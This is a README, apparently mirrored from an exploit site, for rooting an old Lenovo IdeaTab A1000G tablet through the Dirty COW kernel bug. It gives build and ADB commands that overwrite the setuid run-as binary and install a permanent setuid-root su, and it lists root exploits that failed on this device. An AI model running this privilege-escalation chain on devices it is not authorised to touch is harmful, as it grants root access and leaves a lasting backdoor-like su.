Share
## https://sploitus.com/exploit?id=D7D5D2DE-DBCE-58E9-BB12-14E32746576D
# Lenovo IdeaTab A1000G โ Root
> **Note:** This documentation and exploit code was generated with AI assistance (Kiro).
> Verify before use โ AI can and does make mistakes.
## Device
| Field | Value |
|-------|-------|
| Model | Lenovo IdeaTab A1000G |
| SoC | MediaTek MT8317 (= MT6517) |
| CPU | Dual-core Cortex-A9 @ 1.2GHz |
| Kernel | Linux 3.4.0 |
| Build | A1000G_A412_01_09_130907_2G |
| Android | 4.1.2 (Jelly Bean) |
## Prerequisites
- USB debugging enabled
- ADB connected
- Android NDK r28+ at `~/Android/Sdk/ndk/`
- `busybox-armv7l` static binary (busybox.net/downloads/binaries/1.21.1/)
## Exploit โ CVE-2016-5195 (Dirty COW)
Race condition in kernel `mmap`/`write` path. Affects kernels 2.6.22โ4.8.3.
Target: `/system/bin/run-as` (SUID root, 9448 bytes).
### 1. Compile
```bash
NDK=~/Android/Sdk/ndk/28.2.13676358/toolchains/llvm/prebuilt/linux-x86_64/bin
CC=$NDK/armv7a-linux-androideabi21-clang
# dcow exploit
$CC -o dcow -static -march=armv7-a -mfloat-abi=softfp -O1 \
-UPRINT -UDEBUG "-DLOGV(...)=printf(__VA_ARGS__)" \
dcow_main.c dirtycow_android.c
# su binary
$CC -o su -march=armv7-a -mfloat-abi=softfp -Os -s -fno-pie -no-pie su2_src.c
```
### 2. Pad su to target size (9448 bytes)
```python
with open('su', 'rb') as f: data = f.read()
data = data + b'\x00' * (9448 - len(data))
with open('su_padded', 'wb') as f: f.write(data)
```
### 3. Run
```bash
adb push dcow su_padded su /data/local/tmp/
adb shell chmod 755 /data/local/tmp/dcow /data/local/tmp/su_padded /data/local/tmp/su
adb shell "/data/local/tmp/dcow /data/local/tmp/su_padded /system/bin/run-as"
# Wait for: [+] Success!
```
### 4. Install su permanently
```bash
# Enter root shell first
adb shell /system/bin/run-as
# Then:
mount -o remount,rw /system
toolbox dd if=/data/local/tmp/su of=/system/bin/su
toolbox chmod 6755 /system/bin/su
toolbox chown root:root /system/bin/su
```
### 5. Install busybox (optional)
```bash
# From PC:
adb push busybox-armv7l /data/local/tmp/busybox
# From root shell:
toolbox dd if=/data/local/tmp/busybox of=/system/bin/busybox
toolbox chmod 755 /system/bin/busybox
/system/bin/busybox --install /system/bin/
```
## Usage
```bash
adb shell
/system/bin/run-as # drops to root shell (#)
id # uid=0(root)
```
> `adb shell /system/bin/su -c cmd` tidak works karena ADB drop setuid.
> Harus masuk interactive shell dulu.
## Post-Root
- `/system/bin/run-as` โ overwritten (original run-as functionality broken)
- `/system/bin/su` โ permanent SUID su binary
- `/system/bin/busybox` โ busybox 1.21.1
## Failed Attempts
| Method | Reason |
|--------|--------|
| CVE-2013-1763 sock_diag | Not compiled into kernel |
| CVE-2013-6282 get_user/put_user | ldrt/strt blocked on Cortex-A9 |
| CVE-2014-3153 Towelroot | Kernel panic โ sendmmsg iovstack offset wrong for MTK |
| Framaroot AdbActivity | NullPointerException, incompatible |
| /proc/self/mem overwrite | Kernel addresses inaccessible from userspace |
## Files
```
.
โโโ README.md
โโโ root.sh # automated root script
โโโ dirtycow_android.c # CVE-2016-5195 core (Arinerron fork)
โโโ dcow_main.c # main() wrapper
โโโ su2_src.c # su binary source
```
> Precompiled binaries not included โ compile from source using the steps above.
## References
- CVE-2016-5195 source: [Arinerron/CVE-2016-5195](https://github.com/Arinerron/CVE-2016-5195)
- Firmware ROM (different build, used for kernel symbol extraction only):
[Lenovo_A1000G_MT6577_01_24_130329](https://www.mediafire.com/file/6g1iux9kf1mls2u/Lenovo_A1000G_MT6577_01_24_130329.zip/file)
โ symbols from this ROM work on build `A412_01_09_130907` as both share the same kernel virtual layout